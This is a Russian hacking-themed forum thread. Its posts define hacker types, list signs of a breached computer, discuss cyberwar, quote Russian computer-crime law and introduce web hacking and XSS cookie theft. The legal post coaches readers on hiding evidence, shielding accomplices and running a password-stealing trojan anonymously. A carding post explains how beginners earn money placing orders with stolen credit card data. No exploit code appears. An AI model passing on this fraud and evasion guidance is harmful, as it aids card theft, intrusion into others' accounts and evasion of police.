ДОБРО ПОЖАЛОВАТЬ НА ПЛАНЕТУ СНОВИДЕНИЙ

Объявление

Что бы стать участником нашего форума вы должны обязательно зарегистрироваться. Для этого, в верхней панели навигации нажмите РЕГИСТРАЦИЯ, заполните предложенную форму (достаточно простая и понятная).
После того как на ваш E-mail придёт пароль вы сможете в полной мере воспользоваться форумом ПЛАНЕТЫ СНОВИДЕНИЙ.
Для этого так же в верхней панели навигации нажмите ВОЙТИ и внесите ваши данные.


Регистрируйтесь, не ленитесь. ПЛАНЕТА СНОВИДЕНИЙ ждёт ВАС. * Регистрируйтесь, не ленитесь. ПЛАНЕТА СНОВИДЕНИЙ ждёт ВАС. * Регистрируйтесь, не ленитесь. ПЛАНЕТА СНОВИДЕНИЙ ждёт ВАС.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Х@кераунд

Сообщений 1 страница 11 из 11

1

Кто такие «Хакеры»

      Когда компьютеры только появились, слово «хакер» было уважительным. Его использовали для обозначения компьютерных гениев, способных переписать часть ядра операционной системы, чтобы она стала лучше работать или «сбросить» всеми забытый администраторский пароль. Хакеров уважали за умение нестандартно мыслить и находить разумные решения самым сложным проблемам.

     Однако с течением времени оригинальное значение слова было утеряно, поскольку далеко не все «хакеры» ограничивались изменениями ядер ОС и восстановлением паролей по просьбам своих коллег. Некоторые из них начали вторгаться в плохо защищенные компьютерные системы, чтобы «доказать, что это возможно» и, наконец, перешли зыбкую границу взлома с целью кражи какой-либо важной информации или системных ресурсов.

     Компьютерное сообщество, столкнувшееся с размыванием значения термина «хакер», ввело в обиход несколько дополнительных терминов, например, «script kiddie» и «cracker». Термин «script kiddie» используется для обозначения людей, не обладающих существенными познаниями в области хакерства и просто использующих для взлома чужие хакерские утилиты — скрипты, эксплойты и т. п. Термин «cracker» обозначает человека, находящегося где-то между script kiddie и хакером по уровню своих знаний. Он умеет взламывать программы и, например, избавляться от защиты от копирования, но недостаточно умен, чтобы самостоятельно находить новые уязвимости или писать хакерские утилиты.

     Все еще более усложнилось, когда некоторые «кандидаты» в хакеры начали использовать хакерские утилиты, созданные кем-то другим, взламывать программы и воровать сервисы, в то же время, делая нечто общественно полезное, а «крэкеры» перестали ломать программы и удалять защиту от копирования, а принялись взламывать компьютеры в интернете. Из-за всех этих пертурбаций значение термина «хакер» стало гораздо менее «черно-белым», и в итоге были представлены термины «black hat», «white hat» и «grey hat».

     «Black hat» — плохой, «черный» хакер, который взламывает программы и иные системы с целью кражи информации, запускает DDoS-атаки и крадет номера кредитных карт. «White hat», «белый» хакер, наиболее близок к оригинальному значению термина «хакер» — много знающий программист и эксперт по безопасности, использующий свои таланты чтобы помогать повышать безопасность компьютерных систем и ловить преступников. Где-то между ними находятся «grey hat», серые хакеры, которые занимаются всем понемногу.

     Термины «хакер», «крэкер» и «script kiddie» часто используются в интернете и других средствах массовой коммуникации, хотя люди, занятые в области обеспечения информационной безопасности, предпочитают разделение хакеров на «белых» и «черных». Наконец, все эти термины субъективны, зависят от причастности пользующегося ими человека к одной или другой группе и могут провоцировать долгие споры о том, кто же на самом деле «черный», а кто — «белый» хакер.

0

2

Как обнаружить хакерскую атаку

       Есть множество способов воспользоваться большинством уязвимостей. Для хакерской атаки можно использовать один эксплойт, несколько эксплойтов одновременно, неверные настройки программных компонентов или даже программу-бэкдор, установленную в операционную систему в процессе предыдущей атаки. Из-за этого детектирование хакерской атаки становится не самой простой задачей, особенно для неопытного пользователя. В этом разделе мы постараемся сформулировать советы, способные помочь читателю определить, подвергается ли его компьютер хакерской атаке или же защита компьютера уже была взломана ранее. Помните, что, как и в случае вирусов, никто не дает 100% гарантии, что вы сможете зафиксировать хакерскую атаку подобными способами. Впрочем, если ваша система уже взломана, то вы наверняка отметите некоторые из нижеприведенных признаков. Windows-компьютеры: Подозрительно высокий исходящий трафик. Если вы пользуетесь дайлапом или ADSL-подключением и заметили необычно большое количество исходящего сетевого трафика (в частности, проявляющегося, когда ваш компьютер работает и подключен к интернету, но вы им не пользуетесь), то ваш компьютер, возможно, был взломан. Такой компьютер может использоваться для скрытой рассылки спама или для размножения сетевых червей. Повышенная активность жестких дисков или подозрительные файлы в корневых директориях. Многие хакеры после взлома компьютера производят сканирование хранящейся на нем информации в поисках интересных документов или файлов, содержащих логины и пароли к банковским расчетным центрам или системам электронных платежей вроде PayPal. Некоторые сетевые черви схожим образом ищут на диске файлы с адресами email, которые впоследствии используются для рассылки зараженных писем. Если вы заметили значительную активность жестких дисков даже когда компьютер стоит без работы, а в общедоступных папках стали появляться файлы с подозрительными названиями, это также может быть признаком взлома компьютера или заражения его операционной системы вредоносной программой. Большое количество пакетов с одного и того же адреса, останавливаемые персональным межсетевым экраном. После определения цели (например, диапазона IP- адресов какой-либо компании или домашней сети) хакеры обычно запускают автоматические сканеры, пытающиеся использовать набор различных эксплойтов для проникновения в систему.
     Если вы запустите персональный межсетевой экран (фундаментальный инструмент в защите от хакерских атак) и
заметите нехарактерно высокое количество остановленных пакетов с одного и того же адреса, то это - признак того, что ваш компьютер атакуют. Впрочем, если ваш межсетевой экран сообщает об остановке подобных пакетов, то компьютер, скорее всего, в безопасности. Однако многое зависит от того, какие запущенные сервисы открыты для доступа из интернета. Так, например, персональный межсетевой экран может и не справиться с атакой, направленной на работающий на вашем компьютере FTP- сервис. В данном случае решением проблемы является временная полная блокировка опасных пакетов до тех пор, пока не прекратятся попытки соединения. Большинство персональных межсетевых экранов обладают подобной функцией. Постоянная антивирусная защита вашего компьютера сообщает о присутствии на компьютере троянских программ или бэкдоров, хотя в остальном все работает нормально. Хоть хакерские атаки могут быть сложными и необычными, большинство взломщиков полагается на хорошо известные троянские утилиты, позволяющие получить полный контроль над зараженным компьютером. Если ваш антивирус сообщает о поимке подобных вредоносных программ, то это может быть признаком того, что ваш компьютер открыт для не санкционированного удаленного доступа. UNIX-компьютеры: Файлы с подозрительными названиями в папке «/tmp».
      Множество эксплойтов в мире UNIX полагается на создание временных файлов в стандартной папке «/tmp», которые не всегда удаляются после взлома системы. Это же справедливо для некоторых червей, заражающих UNIX- системы; они рекомпилируют себя в папке «/tmp» и затем используют ее в качестве «домашней». Модифицированные исполняемые файлы системных сервисов вроде «login», «telnet», «ftp», «finger» или даже более сложных типа «sshd», «ftpd» и других. После проникновения в систему хакер обычно предпринимает попытку укорениться в ней, поместив бэкдор в один из сервисов, доступных из интернета, или изменив стандартные системные утилиты, используемые для подключения к другим компьютерам. Подобные модифицированные исполняемые файлы обычно входят в состав rootkit и скрыты от простого прямого изучения. В любом случае, полезно хранить базу с контрольными суммами всех системных утилит и периодически, отключившись от интернета, в режиме одного пользователя, проверять, не изменились ли они. Модифицированные «/etc/passwd», «/etc/shadow» или иные системные файлы в папке «/etc». Иногда результатом хакерской атаки становится появление еще одного пользователя в файле«/etc/passwd», который может удаленно зайти в систему позже.
       Следите за всеми изменениями файла с паролями, особенно за появлением пользователей с подозрительными логинами. Появление подозрительных сервисов в «/etc/services». Установка бэкдора в UNIX- системе зачастую осуществляется путем добавления двух текстовых строк в файлы «/etc/services» и «/etc/ined.conf». Следует постоянно следить за этими файлами, чтобы не пропустить момент появления там новых строк, устанавливающих бэкдор на ранее неиспользуемый или подозрительный порт.

0

3

Хакерство- война четвёртого поколения

     Чешские телезрители наверняка подавились попкорном, когда воскресным днем 17 июня, во время прогноза погоды в прямом эфире вырос колоритный гриб ядерного взрыва. За этим последовало извинение от руководства телеканала, и объяснение что хакеры взломали ТВ и прокрутили злостный видеоролик. Нарицательное понятие «хакерство» произошло от жаргонного глагола «to hack», что означает - рубить, кромсать. Это явление первоначально имело больше положительных, нежели деструктивных свойств. Хакеры находили уязвимые места в программах, указывая программистам на ошибки, помогая улучшать и развивать продукт. С развитием системы массовой коммуникации (СМК) хакерские атаки на сетевые ресурсы всех уровней стали мощным реактивным импульсом эволюции информационных технологий. Однако со временем все чаще стали происходить скандальные инциденты, когда хакеры, желая заработать денег или скандальную популярность, стали наносить непоправимый ущерб, ставя под угрозу жизнедеятельность невиртуального общества. Они ломают домашние странички своих школьных подружек. Они ломают сайты политических и бизнес конкурентов. По подсчетам экспертов хакерские атаки происходят в среднем каждые 39 секунд. Они открыто торгуют PIN-кодами и поддельными кредитными картами через Интернет. По разным оценкам ущерб от взлома коммерческих систем исчисляется сотнями миллионов долларов. Зачастую случаются курьезные случаи, например, говорят, что один американский подросток «свалил» несколько сайтов магазинов спортивной одежды за более чем скромное вознаграждение - джинсы и пару кроссовок. Они нападали на сайты НАСА и Пентагона, ставя под грозу безопасность человечества. Они чуть было ни завалили весь WWW, когда в феврале этого года бомбардировали DDOS (distributed denial of service) атакой столпы всемирной паутины - основные серверы доменных имен (DNS - основная задача которых соотносить вводимые в адресные строки браузеров буквенные адреса сайтов с их IP-адресами). Больше всех пострадали серверы DNS, принадлежащие Департаменту обороны США и Интернет- корпорации по распределению имен и нумерации (ICANN). Аналогичная по масштабам атака была предпринята в октябре 2002 года. Атаки производятся с помощью бот- сетей состоящих из зараженных вирусами компьютеров. Это инструмент, который в случае скоординированной атаки может парализовать работу всего Интернета. Согласно ряду исследований, в состав этих бот-сетей входит более 150 млн. компьютеров во всем мире.
    Масштаб и частота хакерских атак приводит к выводу о том, что угроза кибер-террора реальна. В наши дни Интернет координирует и контролирует все больше и больше жизненно важных социальных систем. Унифицируя жизненное пространство, он делает мир проще и, в то же время, уязвимей для виртуальных атак. Родилась и развивается новая угроза, которую футурологи прозвали - fourth generation warfare (4 GW). Война четвертого поколения - это когда одна из сторон конфликта не в состоянии играть честно, в силу несоответствия количества и качества силы. Ассиметричная война подобна партизанству или терроризму - слабая сторона вынуждена как в восточных единоборствах обратить силу противника против него самого и использовать свою слабость как силу. Тогда стираются границы между войной и миром, а линия фронта перемещается в киберпространство. Подобная тактика перераспределяет силы, предоставляя слабым наступательные возможности. Интернет предоставляет террористическим организациям возможность координации своих действий, возможность вести информационную войну и атаковать самые чувствительные места - ключевые узлы экономики и жизнеобеспечения. Борьба с хакерством заставляет законодателей всего мира дорабатывать правовые нормы, модернизировать закон, приспособляя его к противодействию новым угрозам нового тысячелетия. Так, в российском законодательстве статьи 272 - 274 УК предусматривают до пяти лет лишения свободы за преступления в сфере компьютерной информации. Для выполнения закона, в каждом субъекте Федерации созданы подразделения "К", специализирующиеся на компьютерных преступлениях. Можно ли говорить об организованной преступности?
     Мотивы у рядовых хакеров те же что у уличных погромщиков - революционная романтика, подростковая агрессия. Все это хворост, ждущий искры, руководящего жеста. Являет ли хакерство новую угрозу или это просто та же самая извечная борьба плохих парней с хорошими, только теперь уже на ином оружии? Писатель-фантаст Борис Стругацкий в газете Известия так прокомментировал ситуацию: - "В большинстве своем хакеры - мелкие пакостники, хулиганы. Однако среди них есть и настоящие авторитеты своего дела. И если первые действуют абсолютно бескорыстно, то вторые получают от своей работы дивиденды. Однако для того, чтобы «выключить» Интернет, огромному количеству хакеров необходимо объединиться. А это так же невозможно, как и всем хулиганам, бьющим стекла в подъездах, начать «работать» в один момент. И хотя теоретически это возможно, такое происшествие - из области фантастики". Очень хочется верить Борису Натановичу, и ядерные грибы видеть только в фантастических фильмах.

0

4

Закон!

     Помните, что все действия по взлому незаконны! И вся информация выложенная тут, представленна чисто в ознакомительном порядке. Никто ещё не отменял статьи УК под номерами 272 , 273 , 274. Статья 272. НЕПРАВОМЕРНЫЙ ДОСТУП К КОМПЬЮТЕРНОЙ ИНФОРМАЦИИ
      1.Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет. То есть, если ты не напортачил, не уничтожил данные и не скопировал их себе (нет доказательств-их копий у тебя на дисках), то ты чист. Так что если что-то копируешь, то всегда стирай то, что уже тебе не нужно (иногда FORMAT C: бессилен) параноидально прячь то, что нужно (на флопиках, матрицах и бумажках, но не у себя в квартире, а у соседа, друга или... врага )).
       2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, - наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет. Вывод: Даже если тебя прищучили, и есть все улики и доказательства и в отказ ты идти уже не можешь, то бери на себя всю вину сам. Не верь наглым россказням ментов что, если ты скажешь, кто еще с тобой это совершил, то тебя отпустят, не будут бить и т.д. Отпускать тебя никто не станет - это их хлеб, премии и т.д. Насчет "бить" - уж пусть лучше из тебя сделают котлету, нежели ты сядешь вообще, сядешь на срок вдвое больший и подставишь своих корешей-подельников, которые тебе вряд ли за это будут благодарны.
      Статья 273. СОЗДАНИЕ, ИСПОЛЬЗОВАНИЕ И РАСПРОСТРАНЕНИЕ ВРЕДОНОСНЫХ ПРОГРАММ ДЛЯ ЭВМ.
     1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
      2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет. То есть, если ты закинул трояна кому-то в комп и этот вирь шлет инфу и пароли юзера тебе на мыло, то, прежде чем сделать такую гадость, 1000 раз подумай над ответом на следующие вопросы: - ты регистрировал тот почтовый ящик на свои реальные имя и фамилию? - ты регистрировал тот почтовый ящик через прокси, их цепочку, сокспрокси или же от своего реального АйПи? - если ты юзал прокси, то был ли он Анонимным? Проверял ли ты его на Анонимность? - Как ты забираешь отчеты трояна с того ящика? (из интернет-кафе - минимум опасности; из канализационного люка, приконнектившись ноутбуком к случайно выбранной из тысячи телефонной "лапше" какой-либо из квартир; через кучу прокси; от друга; из своей квартиры - максимум опасности). - оставил ты в том вире или на компе юзера какие-либо следы? - ты был уверен, что юзер не юзал файрвол, ведущий лог, в котором зафиксирована твоя троян-атака? - сам ли ты писал вирь и были ли у тебя ЗЛЫЕ умыслы, побудившие тебя, его написать или использовать? Обычно состав преступления упирается в то, был ли умысел. Нет умысла - нет и состава преступления. Т.е. если ты закинул кому-то вируса, заведомо зная, что он безвреден, а все его действия сводятся к тому, что он рисует цветочек на экране с надписью "С любовью, Борис!", или же, закидывая виря ты не подозревал что ты делаешь такое и насколько это нехорошо - в этих случаях как бы злого умысла нет. Но тут есть одно "НО"... Оно заключается в том, а поверят ли тебе прокурор и судьи? Если ты считаешь, что все законники лохи, то я вынужден тебя разочаровать. Все они либо умные, либо хитрые, либо два в одном 
      Статья 274. НАРУШЕНИЕ ПРАВИЛ ЭКСПЛУАТАЦИИ ЭВМ, СИСТЕМЫ ЭВМ ИЛИ ИХ СЕТИ.
      1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, - наказывается лишением права занимать определенные должности или заниматься определенной деятельностью, на срок до пяти лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет.
       2. То же деяние, повлекшее по неосторожности тяжкие последствия, - наказывается лишением свободы на срок до четырех лет. Нда, уж очень размывчато. "Блокирование" - т.е. ты просто всего-навсего вломился в чью-то аську, поменял пароль юзера на свой, таким образом, что юзер больше не может свою асю юзать (ну не обязательно УИНы и аська, например мейлбокс тоже подходит, да много всего подходит - рутовский пароль, например), то ты, заблокировал информацию, охраняемую законом. "Модификация" - сюда приплести они могут все что угодно... ВСЕ - например ты влез в мыльницу юзера и, не меняя его пароля на свой, всего лишь изменил его имя, введенное им при регистрации с Николай Кольцов на Василий Пупкин. Юзер как и прежде может юзать свой почтовый ящик, но заметь изменение имени - это уже предпосылка о заведении уголовного дела. Также, лазив по чьему-то компу, ты заменил атрибут какого-нибудь наигалимейшего файла на компе юзера с "скрытый" на "нескрытый архивный" например. По сути вреда мало, но под статью деяние попадает. А "нарушение эксплуатации" - это может быть всего лишь факт использования тобой всяких сканеров портов, CGI-дыр, даже галимых нюкеров и флудеров. Ах да, вывод... А вывод таков: подумай, насколько важно тебе то, что ты делаешь, и важнее ли оно свободы? Ну и подумай про степень риска.

0

5

Новичкам!

Итак, этой статьей я начинаю ряд статей серии «АЯ», которая поможет новичку выкинуть на помойку X-Spider и собственноручно, без дополнительных утилит, находить бреши на сайтах. Т.е. ломать их =). Свою серию я назвал «АЯ». Понять это название можно по разному. Например «от А до Я». Или это как вопрос от безнадежности, типа «Все уже умеют! А Я???». Короче думайте сами =). Я конечно не Толстой, но все же =). Так назвать свою серию меня побудил один чел, общаясь с которым в асе, он спросил «А пачиму?». Он хотел спросить меня почему, а я прочитал как «Апач и m00» =)))). Короче не суть =). Задача моей серии – показать новичкам, как на самом деле ломаются сайты. Новички привыкли либо пользоваться X-Spider`Ом, либо бродить по порталам типа wwwsecuritylab.ru в поисках готовых решений. Это не правильно, но деваться им некуда. Ведь они новички. Когда-то и я сканил сайты X-Spider`Ом и тусил на wwwsecuritylab.ru, тупо используя чужие уязвимости. Примером является моя ламерская статья о ломе php-nuke =))) Валяется где-то рядом на портале. Приступим… В первой главе я хотел бы нарисовать общую картину о сегодняшних web-технологиях и web-hack`инге. Возможно я буду писать нудно, где-то даже дотошно, но не прочитав этого, не уловив сути, вы не поймете и остальных глав из серии. Давайте сначала разберемся, что все же относится к web-hacking`у? К веб-хакингу лично я отношу получение полного доступа или других привилегий за счет обхода систем защиты сайта, или сервера вцелом. Самым обычным примером web-hacking`Ом можно назвать дефейсы. Т.е. весь web-hack можно разделить на 2 основные части. Это web-hack на высоком уровне (лом пользовательских скриптов, поиск уязвимостей на сайте) и web-hack на низком уровне (лом сервера вцелом). В моей серии не будет рассмотрен хакинг на низком уровне. Не мой это профиль. Моей задачей является научить новичков работать своей головой и руками. Итак, приступим к знакомству к web-hack`ингу… Для начала разберемся с чем нам придется иметь дело… Даже если вы новичок, вы наверняка слышали что такое html, что такое JavaScript, php или perl. Давайте я попробую рассказать вам что и почем… Начнем с html`а. Что же такое html? Это НЕ язык программирования, как считают многие! Это язык гипер-текстовой разметки, если мне не изменяет память… Html-теги – это кирпичи, исходный текст – это план стройки, а сайт, который вы видите в браузере, это готовая работа по плану из кирпичей. =). Давайте рассмотрим конкретный пример. Для примера возьмем адрес wwwya.ru. Забиваем адрес в браузере и просматриваем исходный код... Я не буду тратить время, чтобы объяснить что и где. Вообще, если вы ниче не поняли из исходника, который вы увидели – обязательно качайте ман по html (ссылка внизу статьи) и разбирайтесь! Знание html вам обязательно понадобится! Из данного сурса, мы видим что на странице будет рисунок и форма для отправки данных к поисковым ботам. Никаких операторов итп, никаких переходов. Линейный алгоритм построения страницы. Т.е. ничего из разряда программирования, что и требовалось доказать. Также вы можете заметить элементы JavaScript. Повторяю! Это НЕ html теги! Ну а что же тогда JavaScript? Насколько я знаю, этот пользовательский язык программирования, основанный группой специалистов из Netscape для своего браузера. Получил признание и всеобщее распространение. В настоящее время трудно представить крупный проект без элементов JavaScript`инга. Что же он дает и что позволяет? JavaScript превращает html страничку в динамическую форму. Даже, я бы сказал, визуальную. JavaScript позволяет программисту запускать скрипты на машине пользователя. Т.е. браузер, используемый пользователем, должен уметь выполнять JavaScript скрипты, т.к. JavaScript, как было сказано выше, является пользовательским языком программирования, и запускается у пользователя на машине. Помимо пользовательских языков web-программирования, существуют и серверные, получившие в настоящее время широкое распространение. Это всем известные php, perl, asp итд. Серверные скрипты выполняются именно на сервере, и не зависят не от браузера пользователя, не от быстродействия машины пользователя. Скорость их работы зависит только от быстродействия сервера, на котором находит запрашиваемый ресурс. Зачем нужны серверные языки программирования? Как и было сказано (и помойму уже не один раз), html не позволяет создавать динамические сайты, т.е. если вам нужно поменять что-то на сайте, или добавить что-то новое, вам придется править html ресурс. Это как клавиатра с одной кнопкой. А серверные языки программирования позволяют «генерировать» html страницу, в зависимости от переданных скрипту параметров. Теоретически, это могут делать и JavaScript скрипты, но для этого, необходимо сначало загрузить все данные на компьютер пользователя, что порой просто невозможно. Серверные скрипты обрабатывают параметры, переданные ему браузером через адресную строку либо формы, и отоброжают нужную инфу конечному пользователю в виде html документа. Скорость генерации html страниц серверным скриптом, т.е. скорость выполнения самого скрипта, очень мала. Настолько, что ею можно пренебречь. Сейчас у вас полная каша в голове от прочитанного выше. Чтобы навести порядок, давайте рассмотрим тот же пример с яндексом. Давайте представим, что яндекс был бы написан на html… Это просто невозможно. Html – это лишь внешний вид сайта. Он не может быть использован для реализации поисковой машины. Html, это как корпус от компьютера. Без внутренностей – это лишь кучка металопластика. И сколько бы вы не нажимали на кнопку Power, вы не заставите корпус работать… Сердце Яндекса – это скрипты. Но почему тогда роль серверных скриптов не могут выполнять пользовательские скрипты (JavaScript, VBScript…)??? Как было сказано, пользовательские скрипты выполняются на машине пользователя. Т.е. если бы яндекс был написан, например на JavaScript`е, то при заходе на него, он сначала бы перекинул всю свою БД к вам на комп =))) Что тоже невозможно. БД яндекса настолько велика, что ее обслуживают кучища серверов, объедененных в сеть. Представьте себе 2-х комнотную квартиру, забитую компами =))) Вот так примерно выглядит сердце Яндекса. Чтоже происходит когда вы посылаете поисковой запрос??? А давайте посмотрим. Зайдем на ya.ru, забьем туда «hack» и нажмем «Найти!». Что мы получим? В адресе браузера мы увидим такую картину: http://www.yandex.ru/yandsearch?rpt=rad&text=hack Из строки видно, что браузер обращается к скрипту, по адресу http://www.yandex.ru/yandsearch и передает ему 2 переменные. Первая «rpt», имеет значение «rad», это что-то не наше… А вторая «text» имеет значение «hack», как раз то, что мы вбили в запрос. Скрипт yandsearch сделает выборку из своей базы по переменной text, т.е. Найдет все документы, имеющиеся у него в БД, которые содержат текст «hack» и отобразит его пользователю. При этом будут затрачены только ресурсы сервера! Если бы Яндекс был написан на javaScript, то все эти действия пришлось бы выполянять машине пользователя. Кстати именно поэтому серверные скрипты невозможно просмотреть, т.е. получить сурс. Они выполняются на сервере и выдают готовый html в браузер. Многие новички, ошибочно, считают что исходник серверного скрипта можно просмотреть с помощью браузера. Это не правильно. Вы можете увидеть html исходник, исходник пользовательского скрипта (так как перед исполнением он грузится на машину пользователя), но никак не сурс серверного скрипта. Он доступен только серверу. Надеюсь разница между html, пользовательскими и серверными скриптами ясна и я могу продолжить. Вы можете подумать, что это не имеет отношения к хакигу… Это не так… Поймите, если вы не выучите правила дорожного движения, далеко на своей тачке вы не уедите… тепрь немного истории web-hacking`а… :: [ Как было раньше ] Раньше весь процесс взлома, обычно, упирался в СИ (Социальная Инженерия). Небыло ни php, ни perl, ни asp ничего подобного. А cgi был распространен только на очень крупных проектах, т.к. требовал больших затрат со стороны программиста. Одним словом серверных языков практически не было. Вспомним Митника. В его времена и web-hacking`а не было =))) И web ваще не было =))). Митника можно считать основателем СИ. Когда я только начинал, более опытный чел мне сказал, что Митник – ламер, что время просто тогда было дырявое… Это не так. Митник был, и есть, великий. Это не обсуждается =). Вернемся к веб-хаку. Раньше такого понятия практически не существовало. Лишь еденицы, владеющие знаниями cgi могли проводить атаки на сайты через дыры в скриптах. Другие пользовались СИ, третьи использовали дыры на серверах и в протаколах… Потом появился перл, пхп и другие. Это более «мягкие» языки. Они дали возможность рядовому пользователю создавать достаточно крупные проекты. Что впринципе и произошло =))) Программить стали все, кому не лень =). Что и привело к развитию web-hacking`а, точнее к развитию web-hacking`а на высоком уровне. :: [ Что происходит сейчас… ] Сейчас происходит примерно следующее… Большой дядя решил открыть Интернет-магазин и сгрезти лаве. Но денег на нормального программера он зажал, отдав их неизвестному. Зато сэкономил 100 баксов =))) и купил сыну мороженого =))))). В итоге этот программер, неизвестного качества пишет скрипты интернет-магазина, пускает их в сеть, берет лаве и смывается. Через несколько месяцев работы инет-магаза хозяин вдруг обнаруживает, что на главной странице написано «Дефасед бай Мария Батьковна» =). А еще более частая картина такая. Большой дядя совсем зажимает лаве и покупает готовый скрипт, доступный для всеобщей покупки. И уже через месяц видит на главной «Дефасед бай **Тим. Админ лох» =). Как вы уже поняли, я буду учить именно хакингу, на уровне взлома сайтов. В моей серии вы узнаете как ломить сайты имея, и не имея исходный текст скриптов, как ломить сайты с помощью СИ и прочее. Вступление я сделал, далее выбор за вами. Хочется отметить, что практикуясь и тренируясь, основываясь на мою серию, вы не только научитесь ломить сайты, но и узнаете много о web-технологиях. Таких как html, javascript, php, sql и многое другое. На сегодня это все =(. Ждите продолжения. В следующей главе я научу ломить сайты на серверных скриптах, не зная исходного кода. Будут рассмотрены такие популярные атаки как php-inj, sql-inj и много нового.

0

6

ВебМани?

      Сие повествование станет (надеюсь) для кого-то трамплином в мир кардинга� Ну-с, начнем. Вопрос � что делает каждый (за редким исключением) новичок, явившись на какой-нибудь кардерский форум? Правильно - задает изумительные по своей остроумности вопросы типа �НАРОД!!11 Как я магу палучить бабло с кридитки на ВебМани? Эту кридитку мне дал адин паринь из Америки. Он сказал мне, что как-то можно! Так что гаварите, иначи вы все � ламаки паганые!!1!�. Орфография сохранена. После десятого такого �кардира� уже смеяться не особо хочется. Ребят, мой вам совет � сначала обретите достаточную компетентность в вопросе, а потом уже суйтесь. А то дров можно наломать о-го-го каких. Начиная от стирания вашей учетной записи на форуме и заканчивая ныканьем по своим друзьям от свирепых дядек с пушками. Кроме шуток. Итак, подняв подшивку �Кардерского утра� за 1912 год, вы хоть что-то поняли. �Что-то� - это уже хорошо, поверьте. И если вы теперь можете отличить CVV2 от EXP и даже (о, чудо) знаете, где на кредитке высмотреть эти непонятные штуки, то у вас (теперь-то я прав на 100%) возникает вопрос � а как мне с этих знаний бабки поднять? Почти всегда первой работой человека в кардинге становится вбив. Работа вбивщика или вбивальщика, или вбивалы � кому как больше нравится, заключается в следующем. Имея на руках информацию о кредитной карте, он идет на сайт заказчика. На этом ресурсе обязательно будет что-то сладкое и недорогое... Например, месяц ступа к порно, или же скриптик там небольшой или же софт. И вбивщик �покупает� услугу или вещь, используя инфу с креды какого-то амера. Денежки при этом текут на счет владельца сайта (если у вас возникнет желание � расскажу, как такие сайты делать). И все. Обычно вбив идет на суммы меньше 50. Хотя я знавал маньяков, которые и по 150 клали стоимость айтема. За один вбив человеку, у которого ни карт, ни проксей нет, платят очень мало � 0.5 � 1у.е. Хотя 10$$ за ночь можно сделать легко. Даже при самом отстойном коннекте. Как защищаться в И-нете и зачем покупать прокси, если и так можно взять в открытую, говорить не буду. На эту тему говорилось многое. Как только появятся первые денежки (хотя бы 20), то можно уже начинать вбивать используя собственные карты и прокси. Сколько это стоит � я не знаю. Как договоритесь. Но обычно не меньше 7-10. Итак, первый месяц работы позади. У кого-то в кармане осела кругленькая сумма, у кого-то - не очень. Но я полагаю, у каждого возник вопрос � �Сколько можно быть вбивалой-то, е-мое?�. Возможные направления - это вещевой кардинг, адульт, букмейкерство, скаммерство, и прочее. Я, если будет время, освещу и другие варианты. Указывайте в комментариях, о чем вы хотите узнать.

0

7

Предназначение XSS-атак [ Хакерство для новичков ]


         Я хочу рассказать Вам о предназначении XSS-атак, поскольку XSS-уязвимости представляют гораздо большую опасность, нежели просто кража сookies. Обо всём по порядку… Сначала об XSS в целом. Аббревиатура XSS расшифровывается как Сross Site Sсriрting («межсайтовый скриптинг»). Принято его называть именно XSS, а не СSS, так как СSS введена намного раньше, и означает она Сasсading Style Sheets – «каскадные таблицы стилей» (применяются в оформлении HTML-станиц). Сross – это «крест», поэтому первая буква в «межсайтовом скриптинге» заменена именно на «X». XSS – это уязвимость на сервере, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу (не в скрипт, в отличие от РERL- или PHP-инклудинга) произвольный код путём передачи его в качестве значения нефильтруемой переменной. (TRINUX хорошо описал этот вид атаки в статьях: http://www.hackzona.ru/hz.php?name=News … mp;thold=0 и http://www.hackzona.ru/hz.php?name=News … mp;thold=0 ). Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте (например, PHP) не проверяется на наличие запретных символов, таких, как: <,>,’,” и многих других. Сначала значение переменной передаётся от HTML-страницы, загруженной в браузере пользователя, php-скрипту (через РOST- или GET-запрос). РOST-запрос передаёт переменные через массив, неотображаемый в адресной строке браузера; GET-запрос обнаруживает себя в адресной строке следующим образом: http://www.hackzona.ru/hz.php?name=News … mp;thold=0 Так, скрипту hz.php передадутся переменные: $$name – со значением “News”, $$file – со значением “artiсle”, $$sid – со значением “3499” etс… Естественно, удобнее работать с GET-запросами, поэтому, хакер сохраняет страницу взламываемого сайта и в строке, типа РOST заменяет на GET. Далее пхп-скрипт, например, генерирует хтмл-страницу, в которой выводит значение одной из переданных переменных безо всякой фильтрации. НО! Если злоумышленник, составляя GET-запрос, вместо обычного значения переменной подставит какие-нибудь ключевые тэги (например, или <ВR>), то они выполнятся интерпритатором! Так уж закрепилось, что большинство компьютерных хулиганов используют XSS только для кражи кукисов (сookies – в большинстве случаев они хранят сессию, присвоив себе которую, злоумышленник сможет быть на сайте под чужим аккаунтом, например, в форуме, где желательна регистрация. Также они хранят зашифрованный пароль, расшифровав который, хулиган сможет завладеть аккаунтом на 100%).
